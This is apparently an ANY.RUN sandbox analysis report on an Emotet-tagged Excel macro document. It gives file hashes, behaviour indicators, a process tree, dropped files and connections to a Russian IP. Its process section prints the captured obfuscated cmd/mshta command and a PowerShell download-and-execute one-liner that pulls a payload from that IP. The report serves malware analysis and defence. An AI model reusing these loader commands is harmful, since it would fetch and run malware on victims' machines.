analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Info_774757202.xls

Full analysis: https://app.any.run/tasks/72674a47-af57-4719-82f3-a2abff1202a1
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 24, 2022, 23:55:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros40
emotet-doc
emotet
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Jan 24 14:50:55 2022, Last Saved Time/Date: Mon Jan 24 15:24:17 2022, Security: 0
MD5:

661C7531C880D43EA79ABCFDD601CB88

SHA1:

FB9D14DC1589C48AF985B83882A4191E8CAC0790

SHA256:

48381201170794D6DDBC713A1A5BC89CE39472D3EB35A9173FA84D992AA9DFDC

SSDEEP:

3072:AH+Hyms/k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIixe53lGvFTQ3IzxgdrvxpU0f:e+Hyms/k3hbdlylKsgqopeJBWhZFVE+i

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2152)
    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2152)
    • Executes PowerShell scripts

      • mshta.exe (PID: 2856)
  • SUSPICIOUS

    • Reads default file associations for system extensions

      • EXCEL.EXE (PID: 2152)
    • Checks supported languages

      • cmd.exe (PID: 276)
      • mshta.exe (PID: 2856)
      • powershell.exe (PID: 2656)
    • Reads Microsoft Outlook installation path

      • mshta.exe (PID: 2856)
    • Reads the computer name

      • mshta.exe (PID: 2856)
      • powershell.exe (PID: 2656)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 276)
    • Reads Environment values

      • powershell.exe (PID: 2656)
  • INFO

    • Checks supported languages

      • EXCEL.EXE (PID: 2152)
    • Reads the computer name

      • EXCEL.EXE (PID: 2152)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2152)
    • Reads internet explorer settings

      • mshta.exe (PID: 2856)
    • Creates files in the user directory

      • EXCEL.EXE (PID: 2152)
    • Checks Windows Trust Settings

      • powershell.exe (PID: 2656)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

HeadingPairs:
  • Worksheets
  • 2
  • Excel 4.0 Macros
  • 1
TitleOfParts:
  • Time Card
  • Sheet1
  • XXL
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
Company: -
CodePage: Windows Cyrillic
Security: None
ModifyDate: 2022:01:24 15:24:17
CreateDate: 2022:01:24 14:50:55
Software: Microsoft Excel
LastModifiedBy: xXx
Author: xXx
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
4
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs mshta.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2152"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
276cmd /c ms^ht^a ht^t^p:/^/0x^5cf^f^39c^3^/^sec^/^se4.htmlC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2856mshta http://0x5cff39c3/sec/se4.htmlC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
2656"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se4.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Total events
2 645
Read events
2 550
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
2152EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR2DA4.tmp.cvr
MD5:
SHA256:
2856mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\se4[1].htmbinary
MD5:EE3D40A393DFC20684FDCD4282DA0284
SHA256:2C8F62708A16B068433ED479A0E16143257BD15B91EF904F30642CD0E24716DD
2152EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.datini
MD5:10A06E44FA557E4ACDC37A96D3628AD1
SHA256:CC1DCE7BEA7261049C9955CCEBFC5FF90D09558C95732AF04F5F34599B261D6C
2152EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Info_774757202.xls.LNKlnk
MD5:0AE9C087F4AC4877297C2ACB5749D090
SHA256:9818F5204D20A251F8F040759E0E8CBABD5A3FD522937B63270197ABAA4034FC
2656powershell.exeC:\Users\admin\AppData\Local\Temp\juqkklfv.2yk.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2656powershell.exeC:\Users\admin\AppData\Local\Temp\rprbq0rt.eho.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2656powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:1068BF0B9B98C206F587A7DB05F6DD06
SHA256:534478EDAFC5087DAA3749624454988B1F7DF923BF1A0A9E28C5F97C3308CFDB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
3
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2856
mshta.exe
GET
200
92.255.57.195:80
http://92.255.57.195/sec/se4.html
RU
binary
10.9 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2656
powershell.exe
92.255.57.195:80
Telecom SP Ltd
RU
malicious
2856
mshta.exe
92.255.57.195:80
Telecom SP Ltd
RU
malicious

DNS requests

No data

Threats

No threats detected
No debug info